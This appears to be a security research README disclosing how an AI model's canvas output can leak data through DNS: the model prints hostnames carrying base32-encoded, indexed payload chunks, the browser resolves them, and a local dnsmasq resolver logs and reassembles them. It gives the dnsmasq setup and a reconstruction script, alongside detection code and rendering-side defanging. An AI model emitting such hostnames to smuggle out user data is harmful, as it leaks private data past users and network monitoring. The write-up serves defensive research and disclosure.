**Research Disclosure:** A controlled security research experiment demonstrating DNS-based data exfiltration through browser rendering behavior.

This repository documents a controlled research experiment that demonstrates how DNS lookups triggered by rendered content can be used to exfiltrate data. The technique leverages the browser's automatic DNS resolution behavior when rendering hostnames, without requiring HTTP requests or file uploads.

**Key Insight:** The model only prints strings. The canvas renders those strings. The browser then issues DNS queries for hostnames that appear in the rendered content.
- Executive Summary
- How It Works
- System Architecture
- Implementation
- Detection & Mitigation
- Lab Setup
- Ethical Considerations
- Contributing
## Executive Summary

This research demonstrates a method to exfiltrate small payloads (such as images) by encoding data into DNS query names. By operating a local resolver that is authoritative for a private test zone, the full query name carries the payload in its subdomain labels and is visible in resolver logs.

**Scope:** Controlled lab environment with non-sensitive data only.
## How It Works

```text
┌──────────────┐      ┌──────────────┐      ┌──────────────┐
│    Encode    │─────▶│    Canvas    │─────▶│   Browser    │
│   Payload    │      │   Renders    │      │   Resolves   │
└──────────────┘      └──────────────┘      └──────┬───────┘
                                                   │
                                                   ▼
                                            ┌──────────────┐
                                            │Local Resolver│
                                            │     Logs     │
                                            └──────┬───────┘
                                                   │
                                                   ▼
                                            ┌──────────────┐
                                            │ Reconstruct  │
                                            │   Payload    │
                                            └──────────────┘
```

1. **Encode:** Convert payload to DNS-safe alphabet (base32/base64url)
2. **Chunk:** Split into DNS-compliant segments (≤63 chars per label, ≤253 total)
3. **Index:** Add sequence markers for deterministic reassembly
4. **Trigger:** Canvas renders hostnames with embedded chunks
5. **Resolve:** Browser automatically performs DNS lookups
6. **Capture:** Local authoritative resolver logs full query names
7. **Reconstruct:** Parse logs, sort by index, decode payload
Example query names:

```text
p001_db.MFRGGZDFMZTQ====.exfil.lab
p002_db.MFWWK3TLNB2GI===.exfil.lab
p003_db.MZXW6YTBOI======.exfil.lab
```
## System Architecture

- **Client:** macOS laptop with ChatGPT canvas in browser
- **Resolver:** `dnsmasq` running locally
  - Acts as normal forwarder for internet
  - Authoritative for private test zone
- **Zone:** Private test zone (e.g., `exfil.lab`) not delegated publicly
## Implementation

Payload format:

```text
<index><separator><payload-chunk>[<separator><checksum>]
```

Constraints:

- Character set: DNS-legal hostnames only
- Label length: ≤63 characters
- Total FQDN: ≤253 characters
- Each chunk must be unique (prevent cache collapsing)
Minimal dnsmasq configuration:

```conf
# Loopback only
listen-address=127.0.0.1,::1
port=53
bind-interfaces

# Normal recursion for everything else
server=1.1.1.1
server=2606:4700:4700::1111

# Make the test zone local and authoritative
local=/exfil.lab/

# Wildcard reply for any name in the zone
address=/.exfil.lab/127.0.0.1

# Per-query logging
log-queries
log-facility=/opt/homebrew/var/log/dnsmasq.log
```
**Critical Settings:**

- `local=/exfil.lab/` - Stops forwarding, makes resolver authoritative
- `address=/.exfil.lab/127.0.0.1` - Returns valid answer for all names
- `log-queries` - Captures complete query names
Ensure macOS network settings list 127.0.0.1 as the first DNS server:

```shell
# Check current DNS servers
scutil --dns
# Set DNS server (Network Preferences > Advanced > DNS)
```

## Detection & Mitigation

**DNS Layer:**

- Many unique subdomains under one zone in short time window
- Leftmost labels with high Shannon entropy (>40 chars)
- Clear sequence markers (`p001`, `p002`, etc.)
- Fixed loopback addresses for all responses
**Network Monitoring:**

```text
# Alert criteria
- First label length > 40 characters
- High uniqueness ratio under single zone
- Burst of NXDOMAIN responses
- Unusual encoding patterns (base32/base64)
```

**Mitigations:**

- ✅ Treat untrusted hostnames as inert text
- ✅ Use strict allow-lists for external resources
- ✅ Apply Content Security Policy (CSP)
- ✅ Limit hostname count/length per render
- ✅ Prefer offline rendering for previews
- ✅ Centralize DNS egress through controlled resolvers
- ✅ Block direct access to public DoH/DoT endpoints
- ✅ Deploy Response Policy Zones (RPZ)
- ✅ Alert on high-entropy DNS labels
- ✅ Monitor DNS query uniqueness ratios
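The DNS-layer signals and alert criteria above can be scored directly from dnsmasq's `log-queries` output. The following is an added example written for this README, not code from the repository or its `scripts/` directory. It assumes the dnsmasq log line format, treats the last two labels of a name as its zone (a production deployment would use the public suffix list), and uses illustrative thresholds; the sample log lines are constructed (the `exfil.lab` names are the page's own samples plus one longer chunk), and the `telemetry.example.net` allow-list entry is invented to show how the long-label false positive noted in the limitations is handled.

```python
"""Added example: score dnsmasq query logs for DNS-exfiltration signals."""
import math
import re
from collections import defaultdict

# dnsmasq log-queries line: "<date> dnsmasq[<pid>]: query[A] <name> from <client>"
QUERY_RE = re.compile(r"query\[(?P<qtype>[A-Z]+)\] (?P<name>\S+) from (?P<client>\S+)")
# Sequence marker such as "p001_" at the start of the leftmost label
SEQ_RE = re.compile(r"^p\d{2,}_", re.IGNORECASE)
# Label drawn only from the base32 alphabet, optionally padded
BASE32_RE = re.compile(r"^[A-Z2-7]+=*$", re.IGNORECASE)

# Constructed allow-list: zones known to use long opaque labels legitimately
ALLOWED_ZONES = {"telemetry.example.net"}

# Constructed sample log (not captured traffic)
SAMPLE_LOG = """\
Jan  5 10:00:01 dnsmasq[1234]: query[A] www.example.com from 192.168.1.10
Jan  5 10:00:01 dnsmasq[1234]: query[AAAA] www.example.com from 192.168.1.10
Jan  5 10:00:02 dnsmasq[1234]: query[A] cdn.example.com from 192.168.1.10
Jan  5 10:00:02 dnsmasq[1234]: query[A] www.example.com from 192.168.1.11
Jan  5 10:00:03 dnsmasq[1234]: query[A] www.example.com from 192.168.1.12
Jan  5 10:00:05 dnsmasq[1234]: query[A] p001_db.MFRGGZDFMZTQ====.exfil.lab from 127.0.0.1
Jan  5 10:00:05 dnsmasq[1234]: query[A] p002_db.MFWWK3TLNB2GI===.exfil.lab from 127.0.0.1
Jan  5 10:00:05 dnsmasq[1234]: query[A] p003_db.MZXW6YTBOI======.exfil.lab from 127.0.0.1
Jan  5 10:00:05 dnsmasq[1234]: query[A] p004_db.GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQGEZD.exfil.lab from 127.0.0.1
Jan  5 10:00:06 dnsmasq[1234]: query[A] 3f2a9c1d8b7e6f5a4c3b2a1908f7e6d5.telemetry.example.net from 192.168.1.10
Jan  5 10:00:06 dnsmasq[1234]: query[A] 9c8b7a6f5e4d3c2b1a0f9e8d7c6b5a4f.telemetry.example.net from 192.168.1.10
Jan  5 10:00:06 dnsmasq[1234]: query[A] 5e4d3c2b1a0f9e8d7c6b5a4f3e2d1c0b.telemetry.example.net from 192.168.1.10
"""


def shannon_entropy(text):
    """Bits per character; 0.0 for an empty or single-symbol string."""
    if not text:
        return 0.0
    n = len(text)
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def parse_queries(lines):
    """Yield (qtype, name, client) for each query line; other lines are ignored."""
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            # Browsers may send mixed case; normalise so comparisons are stable
            yield m.group("qtype"), m.group("name").rstrip(".").lower(), m.group("client")


def is_allowlisted(name):
    return any(name == z or name.endswith("." + z) for z in ALLOWED_ZONES)


def split_zone(name, zone_labels=2):
    """Return (subdomain labels, zone) using a fixed zone depth (assumption)."""
    labels = name.split(".")
    return labels[:-zone_labels], ".".join(labels[-zone_labels:])


def zone_stats(lines):
    """Aggregate the DNS-layer signals per zone."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "max_label_len": 0,
                                 "max_entropy": 0.0, "seq_markers": 0, "encoded_labels": 0})
    for _qtype, name, _client in parse_queries(lines):
        if is_allowlisted(name):
            continue
        sub, zone = split_zone(name)
        if not sub:
            continue  # query for the zone apex itself: nothing to measure
        s = stats[zone]
        s["queries"] += 1
        s["names"].add(name)
        s["max_label_len"] = max(s["max_label_len"], max(len(lb) for lb in sub))
        s["max_entropy"] = max(s["max_entropy"], max(shannon_entropy(lb) for lb in sub))
        if SEQ_RE.match(sub[0]):
            s["seq_markers"] += 1
        if any(len(lb) >= 12 and BASE32_RE.match(lb) for lb in sub):
            s["encoded_labels"] += 1
    return stats


def is_suspicious(s, min_unique=3, min_unique_ratio=0.8):
    """Uniqueness is the base signal; any one content signal on top of it alerts."""
    unique = len(s["names"])
    if unique < min_unique or unique / s["queries"] < min_unique_ratio:
        return False
    return (s["max_label_len"] > 40
            or s["seq_markers"] >= 2
            or s["encoded_labels"] >= 2)


def suspicious_zones(lines):
    return sorted(z for z, s in zone_stats(lines).items() if is_suspicious(s))


if __name__ == "__main__":
    for zone, s in zone_stats(SAMPLE_LOG.splitlines()).items():
        verdict = "ALERT" if is_suspicious(s) else "ok"
        print(f"{zone}: {len(s['names'])}/{s['queries']} unique, max label "
              f"{s['max_label_len']}, max entropy {s['max_entropy']:.2f} -> {verdict}")
```

Run against the constructed log, `exfil.lab` is flagged (four unique names out of four queries, sequence markers, base32-only labels and one label over 40 characters), `example.com` is not (repeated lookups of two names), and the allow-listed zone is never scored. The per-zone maximum label entropy is reported but not thresholded here, so it can be tuned against local baseline traffic before it is used as an alert condition.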
Example CSP:

```http
Content-Security-Policy:
  default-src 'self';
  img-src 'self' https://trusted-cdn.example.com;
  connect-src 'none';
```
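CSP limits what a page may fetch, but the rendering-layer mitigations above (treat untrusted hostnames as inert text, limit hostname count and length per render) apply before anything is fetched. The following is an added example written for this README, not code from the repository. It assumes the renderer can pre-process untrusted text before display; the hostname matcher is deliberately permissive so that it also catches the padded base32 labels in the page's samples, the limits are illustrative, and the sample text and `trusted-cdn.example.com` allow-list entry are constructed.

```python
"""Added example: rendering-side hostname policy and defanging."""
import re

# Two or more dot-joined labels; permissive on purpose (allows "_" and "=")
HOST_RE = re.compile(r"(?<![\w.-])(?:[A-Za-z0-9_=-]{1,63}\.)+[A-Za-z]{2,63}(?![\w-])")

# Constructed sample: one allow-listed CDN name and the page's first sample query name
SAMPLE = "Preview image at trusted-cdn.example.com and p001_db.MFRGGZDFMZTQ====.exfil.lab"
ALLOW = ("trusted-cdn.example.com",)


def extract_hostnames(text):
    """All hostname-like tokens in the text, in order of appearance."""
    return [m.group(0) for m in HOST_RE.finditer(text)]


def is_trusted(host, allow_zones):
    """Exact match or subdomain of an allow-listed zone."""
    host = host.lower()
    return any(host == z or host.endswith("." + z) for z in allow_zones)


def policy_violations(text, allow_zones=(), max_label_len=40, max_hosts=5):
    """Reasons the text should not be rendered with network access, if any."""
    untrusted = [h for h in extract_hostnames(text) if not is_trusted(h, allow_zones)]
    reasons = []
    if len(untrusted) > max_hosts:
        reasons.append(f"{len(untrusted)} untrusted hostnames (limit {max_hosts})")
    for host in untrusted:
        longest = max(len(label) for label in host.split("."))
        if longest > max_label_len:
            reasons.append(f"{host}: label length {longest} exceeds {max_label_len}")
    return reasons


def defang(text, allow_zones=()):
    """Replace the dots of every untrusted hostname with '[.]' so the text still
    reads as a hostname to a person but is no longer resolvable by the browser."""
    def repl(m):
        host = m.group(0)
        return host if is_trusted(host, allow_zones) else host.replace(".", "[.]")
    return HOST_RE.sub(repl, text)


if __name__ == "__main__":
    print(extract_hostnames(SAMPLE))
    print(policy_violations(SAMPLE, ALLOW))
    print(defang(SAMPLE, ALLOW))
```

`policy_violations` is the gate for choosing offline rendering; `defang` is the fallback that makes every non-allow-listed hostname inert while leaving the allow-listed CDN name untouched, so the preview still shows what was written without the browser resolving it.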
## Lab Setup

1. Install dnsmasq (macOS):

   ```shell
   brew install dnsmasq
   # Create log directory
   mkdir -p /opt/homebrew/var/log
   ```

2. Configure dnsmasq:

   ```shell
   cp dnsmasq.conf.example /opt/homebrew/etc/dnsmasq.conf
   ```

3. Start resolver:

   ```shell
   sudo brew services start dnsmasq
   ```

4. Verify setup:

   ```shell
   dig @127.0.0.1 test.exfil.lab
   ```

5. Monitor logs:

   ```shell
   tail -f /opt/homebrew/var/log/dnsmasq.log
   ```
```python
# See scripts/reconstruct.py for full implementation
import base64
import re


def parse_dnsmasq_logs(log_file, zone):
    """Extract and reconstruct the payload from dnsmasq query logs.

    Each chunk carries its own base32 padding, so chunks are decoded one at a
    time and the bytes concatenated; decoding the joined string would fail on
    the embedded padding.
    """
    # Keyed by index so a retried query for the same chunk is not counted twice
    chunks = {}
    # re.escape keeps the dots in the zone name literal
    pattern = rf'query\[A\] (p\d+)_db\.([^.\s]+)\.{re.escape(zone)}'
    with open(log_file) as f:
        for line in f:
            match = re.search(pattern, line, flags=re.IGNORECASE)
            if match:
                index = int(match.group(1)[1:])
                chunks[index] = match.group(2)
    # Reassemble in index order; casefold accepts hostnames the browser lowercased
    return b''.join(
        base64.b32decode(chunks[i], casefold=True) for i in sorted(chunks)
    )
```

Limitations:

- Throughput: Modest - suitable for small payloads only
- Detectability: Aggressive parallelism increases detection risk
- False Positives: Some legitimate infrastructure uses long/hex labels
- Scope: Controlled research with non-sensitive data
This research demonstrates that:
- Security boundaries exist at rendering and network layers
- Canvas hardening and DNS egress controls are critical
- Traditional payload inspection may miss DNS-based channels
- Multiple detection signals are needed for robust monitoring
## Ethical Considerations

This research is intended for:

- ✅ Security research and education
- ✅ Defensive security improvements
- ✅ Controlled lab environments
- ✅ Authorized penetration testing

NOT for:

- ❌ Unauthorized access or data theft
- ❌ Production systems without permission
- ❌ Malicious purposes

**Responsible Disclosure:** This research has been shared with relevant parties for security improvements.
## Contributing

Contributions are welcome! Please:
- Fork the repository
- Create a feature branch
- Submit a pull request with clear description
Areas for contribution:
- Additional detection signatures
- Reconstruction tooling
- Cross-platform testing
- Documentation improvements
MIT License - See LICENSE file for details
Kai Aizen | SnailSploit
- Research Blog: https://Snailsploit.com
- Full Logs: [Link to logs]
- Flow Diagram: dns_exfil_flow.png
Thank you to the security research community for responsible disclosure practices and collaborative defense improvements.
**Disclaimer:** This research is provided for educational and defensive security purposes only. Users are responsible for ensuring compliance with applicable laws and regulations.